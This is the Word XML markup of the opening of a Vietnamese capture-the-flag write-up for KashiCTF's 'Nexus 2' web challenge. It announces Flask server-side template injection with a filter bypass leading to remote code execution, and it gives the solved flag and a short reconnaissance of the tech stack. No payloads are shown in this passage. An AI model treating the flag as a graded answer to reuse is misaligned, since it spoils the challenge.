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stylesWithEffects.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles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7.jpeg" ContentType="image/png"/>
  <Override PartName="/word/header3.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/media/image6.jpeg" ContentType="image/png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media/image5.jpeg" ContentType="image/png"/>
  <Override PartName="/word/header5.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/media/image4.jpeg" ContentType="image/png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media/image3.jpeg" ContentType="image/png"/>
  <Override PartName="/word/header8.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="0" w:after="191" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="4079" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>CTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:spacing w:before="192" w:after="214" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="3619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="12"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t>Nexus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="215" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="1549" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="13"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>Server-Side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Template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Injection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(SSTI)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—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Filter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Bypass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→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="1549" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="198" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="1549" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:cols w:space="425"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:headerReference r:id="rId6" w:type="default"/>
          <w:footerReference r:id="rId7" w:type="default"/>
          <w:pgMar w:top="1939" w:right="1071" w:bottom="0" w:left="1071" w:header="0" w:footer="0" w:gutter="0"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1332"/>
        </w:tabs>
        <w:spacing w:before="7" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="845" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="16"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>pts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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7"/>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:spacing w:before="1" w:after="0" w:lineRule="auto" w:line="231"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="18"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>SSTI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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19"/>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:spacing w:before="1" w:after="0" w:lineRule="auto" w:line="231"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="20"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>Hard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="exact" w:line="14"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="21"/>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:spacing w:before="1" w:after="0" w:lineRule="auto" w:line="231"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1939" w:right="1071" w:bottom="0" w:left="1071" w:header="0" w:footer="0" w:gutter="0"/>
          <w:textDirection w:val="lrTb"/>
          <w:cols w:equalWidth="0" w:sep="0" w:num="4">
            <w:col w:w="1689" w:space="1383"/>
            <w:col w:w="1210" w:space="1532"/>
            <w:col w:w="544" w:space="1666"/>
            <w:col w:w="1740"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="22"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="0D1117"/>
        </w:rPr>
        <w:t>Solves</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="218"/>
        <w:ind w:left="845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845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158" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="845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rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="158" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="26"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>"The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lights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from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the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future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have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become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stronger,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you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have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to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be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careful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boy!!!"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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-191135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27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15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40640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335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3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24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rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="24" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="33"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>Tác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giả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challenge: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Aerex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|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Platform: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KashiCTF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="91" w:lineRule="auto" w:line="215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rPr>
          <w:rFonts w:ascii="Batang" w:hAnsi="Batang" w:eastAsia="Batang" w:cs="Batang"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="3FB950"/>
        </w:rPr>
        <w:spacing w:before="92" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="1846" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Batang" w:hAnsi="Batang" w:eastAsia="Batang" w:cs="Batang"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="3FB950"/>
        </w:rPr>
        <w:t>kashiCTF{lo4zrfGNOi1HbEVSaF1gidjJyKczKtbr}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35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2"/>
      <w:bookmarkEnd w:id="42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3"/>
      <w:bookmarkEnd w:id="43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1"/>
      <w:bookmarkEnd w:id="61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2"/>
      <w:bookmarkEnd w:id="62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3"/>
      <w:bookmarkEnd w:id="63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4"/>
      <w:bookmarkEnd w:id="64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5"/>
      <w:bookmarkEnd w:id="65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6"/>
      <w:bookmarkEnd w:id="6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7"/>
      <w:bookmarkEnd w:id="6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8"/>
      <w:bookmarkEnd w:id="68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69"/>
      <w:bookmarkEnd w:id="69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0"/>
      <w:bookmarkEnd w:id="70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1"/>
      <w:bookmarkEnd w:id="71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2"/>
      <w:bookmarkEnd w:id="72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3"/>
      <w:bookmarkEnd w:id="73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4"/>
      <w:bookmarkEnd w:id="74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5"/>
      <w:bookmarkEnd w:id="75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6"/>
      <w:bookmarkEnd w:id="7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7"/>
      <w:bookmarkEnd w:id="7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8"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="178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rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="178" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="80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1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1939" w:bottom="238" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:type w:val="continuous"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr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1" w:after="361" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="93"/>
      <w:bookmarkEnd w:id="93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Tổng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quan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Challenge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349885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="94" name="Image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28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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="362" w:after="0" w:lineRule="auto" w:line="337"/>
        <w:ind w:left="182" w:right="195" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="95"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Nexus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2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bài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Web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500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điểm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với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chỉ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3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lần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solve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thuộc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loại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khó.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Target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một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ứng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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dụng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web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chạy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Flask/Python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có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tên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PRISM.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Nhiệm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vụ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khai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thác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lỗ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hổng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SSTI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trên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pacing w:val="5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vượt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qua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nghiêm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ngặt,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đạt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RCE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đọc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flag.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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96"/>
      <w:bookmarkEnd w:id="9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97"/>
      <w:bookmarkEnd w:id="9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98"/>
      <w:bookmarkEnd w:id="9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99"/>
      <w:bookmarkEnd w:id="9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0"/>
      <w:bookmarkEnd w:id="10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1"/>
      <w:bookmarkEnd w:id="10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2"/>
      <w:bookmarkEnd w:id="10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3"/>
      <w:bookmarkEnd w:id="10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4"/>
      <w:bookmarkEnd w:id="10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5"/>
      <w:bookmarkEnd w:id="10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6"/>
      <w:bookmarkEnd w:id="10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7"/>
      <w:bookmarkEnd w:id="10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8"/>
      <w:bookmarkEnd w:id="10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09"/>
      <w:bookmarkEnd w:id="10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0"/>
      <w:bookmarkEnd w:id="11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1"/>
      <w:bookmarkEnd w:id="11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2"/>
      <w:bookmarkEnd w:id="11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3"/>
      <w:bookmarkEnd w:id="11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4"/>
      <w:bookmarkEnd w:id="11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5"/>
      <w:bookmarkEnd w:id="11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6"/>
      <w:bookmarkEnd w:id="11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7"/>
      <w:bookmarkEnd w:id="11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8"/>
      <w:bookmarkEnd w:id="11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19"/>
      <w:bookmarkEnd w:id="11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20"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="18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21"/>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="185" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="1941" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="122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1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Challenge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info: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500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điểm,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by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Aerex,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instance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URL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được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cấp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="1941" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="123"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="1941" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="124"/>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="107" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="1941" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="125"/>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:spacing w:before="108" w:after="406" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="126"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t>2.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Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="407" w:after="121" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="127"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>2.1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Fingerprint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tech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stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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-142875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="128" name="Image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11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377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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="121" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="129"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Dùng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Wappalyzer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xác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định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công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nghệ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đang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chạy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trên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target:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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0"/>
      <w:bookmarkEnd w:id="13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1"/>
      <w:bookmarkEnd w:id="13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2"/>
      <w:bookmarkEnd w:id="13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3"/>
      <w:bookmarkEnd w:id="13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4"/>
      <w:bookmarkEnd w:id="13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5"/>
      <w:bookmarkEnd w:id="13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6"/>
      <w:bookmarkEnd w:id="13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7"/>
      <w:bookmarkEnd w:id="13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8"/>
      <w:bookmarkEnd w:id="13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39"/>
      <w:bookmarkEnd w:id="13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0"/>
      <w:bookmarkEnd w:id="14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1"/>
      <w:bookmarkEnd w:id="14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2"/>
      <w:bookmarkEnd w:id="14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3"/>
      <w:bookmarkEnd w:id="14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4"/>
      <w:bookmarkEnd w:id="14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5"/>
      <w:bookmarkEnd w:id="14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6"/>
      <w:bookmarkEnd w:id="14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7"/>
      <w:bookmarkEnd w:id="14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8"/>
      <w:bookmarkEnd w:id="14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49"/>
      <w:bookmarkEnd w:id="14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50"/>
      <w:bookmarkEnd w:id="15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51"/>
      <w:bookmarkEnd w:id="15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52"/>
      <w:bookmarkEnd w:id="15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53"/>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="142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54"/>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="142" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="155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bookmarkEnd w:id="155"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId9" w:type="default"/>
          <w:footerReference r:id="rId10" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1386" w:bottom="238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69"/>
      <w:bookmarkEnd w:id="16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0"/>
      <w:bookmarkEnd w:id="17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1"/>
      <w:bookmarkEnd w:id="17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4"/>
      <w:bookmarkEnd w:id="17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5"/>
      <w:bookmarkEnd w:id="17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6"/>
      <w:bookmarkEnd w:id="17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7"/>
      <w:bookmarkEnd w:id="17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8"/>
      <w:bookmarkEnd w:id="17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9"/>
      <w:bookmarkEnd w:id="1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0"/>
      <w:bookmarkEnd w:id="18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1"/>
      <w:bookmarkEnd w:id="1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2"/>
      <w:bookmarkEnd w:id="1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3"/>
      <w:bookmarkEnd w:id="1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4"/>
      <w:bookmarkEnd w:id="1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5"/>
      <w:bookmarkEnd w:id="18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6"/>
      <w:bookmarkEnd w:id="18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7"/>
      <w:bookmarkEnd w:id="18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8"/>
      <w:bookmarkEnd w:id="18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9"/>
      <w:bookmarkEnd w:id="1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0"/>
      <w:bookmarkEnd w:id="19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1"/>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="176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2"/>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="177" w:after="365" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="1515" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="193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2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Wappalyzer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phát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hiện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Flask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3.0.6,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Python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3.11.15,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Node.js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+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Express</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="365" w:after="149" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="462" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="194"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Web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Framework: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Flask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3.0.6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template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engine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mặc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định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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="149" w:after="149" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="462" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="195"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Language: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Python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3.11.15</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
